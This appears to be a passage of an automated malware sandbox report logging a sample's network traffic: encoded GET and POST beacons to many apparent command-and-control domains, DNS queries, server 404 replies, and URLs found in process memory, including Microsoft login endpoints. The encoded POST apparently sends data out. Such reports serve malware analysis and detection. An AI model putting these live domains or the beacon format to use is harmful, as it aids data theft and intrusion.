  GET /65ev/?MtXH8dRH=dwwIBvsgoPduu1x03LiLu+lQGDFRz/zz5BoPsCvlGePibN32srUYcBSr/DN58z3DeItGY9KIy82Fautrr2SZe1nede/ReFPQiUe32Ik0HHEAi+oCxkmAYmk=&EB04T=0hSTF8phw HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Host: www.route4.org
  Connection: close
  User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
Source: global traffic; HTTP traffic detected:
  GET /x7sd/?EB04T=0hSTF8phw&MtXH8dRH=xxifBtz+TGalALhNcyBTN44Pt4/Sbh2VoP/cWgYTPpbNJICDVfxFhRGjE7kr1iNtdvbH3kOKnhtRMn3Y82SlrP3cRd6my2NsPT3JF2gfd9Xq5l5DKuckTiI= HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Host: www.subitoadomicilio.shop
  Connection: close
  User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
Source: global traffic; HTTP traffic detected:
  GET /h2bb/?MtXH8dRH=qJKXiU3Y6HiR5EQ+73Yb2xdirYIwqZi0pOwD+eljRGtAAZDjMN2OxhxU5kptMPcWm3rk9DqOdiozjqcfWB2Wk1O1f7az6dmfaFVy77DKkP1oB1oCVi4cG1g=&EB04T=0hSTF8phw HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Host: www.syvra.xyz
  Connection: close
  User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
Source: global traffic; HTTP traffic detected:
  GET /edpl/?MtXH8dRH=q/xbqOJEbFxqZdP5Pq3VIJihKFYuoTJpC6d7rXUvusGBValkv/SoX8DUGkqJst/hxOtwmyY8Q6nb8zkY9ZrFeAmdQleBPpTMkSiDA6E42mjQ0ujKW4BvX8M=&EB04T=0hSTF8phw HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Host: www.hm62t.top
  Connection: close
  User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
Source: global traffic; HTTP traffic detected:
  GET /6m23/?MtXH8dRH=xNP+YF7kN8YyHFbGfhCbM4vPtrObLTBpZTX0aom8zYno+17KeimnOIL9nX5Ojh8oMyFsBplL+bbJn9Xx4KkSTeDh/PbqhhexF1uqyGHiSdrf0qV82I/xPx8=&EB04T=0hSTF8phw HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Host: www.zhuoyueapp.top
  Connection: close
  User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
Source: global traffic; HTTP traffic detected:
  GET /7d10/?MtXH8dRH=xmIOFBiXVr0/QiBtlfppycp69g4gIKv/lNzUf7vC8zcE0nFiYZS2LM+232gpuz68llXfjA35BroI76gEmief8pSzBK3ZVT8efzXjLgbijVAA5nUksQudIw0=&EB04T=0hSTF8phw HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Host: www.autonashville.com
  Connection: close
  User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
Source: global traffic; HTTP traffic detected:
  GET /m409/?MtXH8dRH=vgT3vdiL6XmHyQpuqznGmu4w6V9vwAtJ/QiZ74rQqCLiqTobayGplqDkxFD969c96YoECNzKpiIWNF3RdO36GE5+Hjm0BUXOD0JGo2GVPeYBG+tw9V1xstM=&EB04T=0hSTF8phw HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Host: www.dom-2.online
  Connection: close
  User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
Source: global traffic; HTTP traffic detected:
  GET /21tc/?MtXH8dRH=dZthOjk/1dPqZuqAGh/VZ5JieneFrO0O+sFz5UfhqKDq1IpY9KHnH85jTOrt8bOMtDp+Wqm6lvqy9EKuTgvz+0mfPUCSMg+fwe3gbMHC32F4Yn2Fr4fx3Q4=&EB04T=0hSTF8phw HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Host: www.easyanalytics.site
  Connection: close
  User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global trafficHTTP traffic detected: GET /1i25/?MtXH8dRH=hvoPcElTJ0Y3piwLtjSln1mmdkYNLw6anL/4ADmEhhaGoTcu5w6VaNtYttD808rfRbfsmOcnHjc3Cl4jYjdANHGjovYJiL0/kcRCteZsHg47/gztzPUw9dw=&EB04T=0hSTF8phw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.kalomor.topConnection: closeUser-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global traffic | DNS traffic detected: DNS query: www.teksales.space
            Source: global traffic | DNS traffic detected: DNS query: 56.126.166.20.in-addr.arpa
            Source: global traffic | DNS traffic detected: DNS query: www.linkbasic.net
            Source: global traffic | DNS traffic detected: DNS query: www.route4.org
            Source: global traffic | DNS traffic detected: DNS query: www.meery.store
            Source: global traffic | DNS traffic detected: DNS query: www.subitoadomicilio.shop
            Source: global traffic | DNS traffic detected: DNS query: www.syvra.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.hm62t.top
            Source: global traffic | DNS traffic detected: DNS query: www.zhuoyueapp.top
            Source: global traffic | DNS traffic detected: DNS query: www.pelus-pijama-pro.shop
            Source: global traffic | DNS traffic detected: DNS query: www.autonashville.com
            Source: global traffic | DNS traffic detected: DNS query: www.torkstallningar.shop
            Source: global traffic | DNS traffic detected: DNS query: www.dom-2.online
            Source: global traffic | DNS traffic detected: DNS query: www.easyanalytics.site
            Source: global traffic | DNS traffic detected: DNS query: www.kalomor.top
            Source: unknown | HTTP traffic detected: POST /x7sd/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Accept-Encoding: gzip, deflate | Host: www.subitoadomicilio.shop | Origin: http://www.subitoadomicilio.shop | Content-Length: 205 | Content-Type: application/x-www-form-urlencoded | Cache-Control: no-cache | Connection: close | Referer: http://www.subitoadomicilio.shop/x7sd/ | User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 | Data Ascii: MtXH8dRH=8zK/CYulK3elMZg/XDtmJKc66fDfSiiBrefNTgI5IbbaKbiQfvZSij6kA6FY3Bk0W4Tv2lOk8mdDB0LTz2eOh/HjKNiV62lRGDrofCE/eNPYhFYfGfkCCCGPF7LEk5oCH3CNy76ZpOd4OU/99sJE5Fyt1DbmzsoEylJsVvXPMlSHs7dd2aY15pHT1XgXhr+EVw==
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 13 Sep 2024 10:27:11 GMT | Content-Type: text/html | Content-Length: 58288 | Connection: close | Vary: Accept-Encoding | ETag: "6691ebc2-e3b0"
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Fri, 13 Sep 2024 10:27:36 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 424 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Fri, 13 Sep 2024 10:27:38 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 424 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Fri, 13 Sep 2024 10:27:41 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 424 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Fri, 13 Sep 2024 10:27:43 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 424 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 13 Sep 2024 10:27:50 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 13 Sep 2024 10:27:52 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 13 Sep 2024 10:27:55 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 13 Sep 2024 10:27:57 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html; charset=utf-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 13 Sep 2024 10:28:04 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66a8e223-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 13 Sep 2024 10:28:06 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66a8e223-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 13 Sep 2024 10:28:09 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66a8e223-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 13 Sep 2024 10:28:11 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66a8e223-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 13 Sep 2024 10:28:18 GMT | Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40 | Strict-Transport-Security: max-age=3153600000; includeSubDomains | X-Content-Type-Options: nosniff | X-XSS-Protection: 1; mode=block | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 13 Sep 2024 10:28:21 GMT | Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40 | Strict-Transport-Security: max-age=3153600000; includeSubDomains | X-Content-Type-Options: nosniff | X-XSS-Protection: 1; mode=block | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 13 Sep 2024 10:28:23 GMT | Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40 | Strict-Transport-Security: max-age=3153600000; includeSubDomains | X-Content-Type-Options: nosniff | X-XSS-Protection: 1; mode=block | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Sep 2024 10:28:26 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Strict-Transport-Security: max-age=3153600000; includeSubDomainsX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Sep 2024 10:29:14 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Sep 2024 10:29:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Sep 2024 10:29:19 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Sep 2024 10:29:22 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: usnnduqerdgHbr.exe, 00000007.00000002.3576662143.000000000277B000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kalomor.top
            Source: usnnduqerdgHbr.exe, 00000007.00000002.3576662143.000000000277B000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kalomor.top/1i25/
            Source: at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: at.exe, 00000003.00000002.3577269049.0000000004D0E000.00000004.10000000.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576985451.00000000036EE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: at.exe, 00000003.00000002.3577269049.000000000599E000.00000004.10000000.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576985451.000000000437E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
            Source: at.exe, 00000003.00000002.3575543840.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: at.exe, 00000003.00000002.3575543840.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: at.exe, 00000003.00000002.3575543840.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: at.exe, 00000003.00000002.3575543840.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf6
            Source: at.exe, 00000003.00000002.3575543840.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: at.exe, 00000003.00000002.3575543840.0000000003581000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: at.exe, 00000003.00000002.3575543840.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: at.exe, 00000003.00000003.2146292439.000000000856E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: at.exe, 00000003.00000002.3577269049.0000000004858000.00000004.10000000.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576985451.0000000003238000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2261440991.0000000010C68000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.aapanel.com/new/download.html?invite_code=aapanele
            Source: at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: at.exe, 00000003.00000002.3577269049.000000000567A000.00000004.10000000.00040000.00000000.sdmp, at.exe, 00000003.00000002.3579233466.0000000006B40000.00000004.00000800.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576985451.000000000405A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
            Source: at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
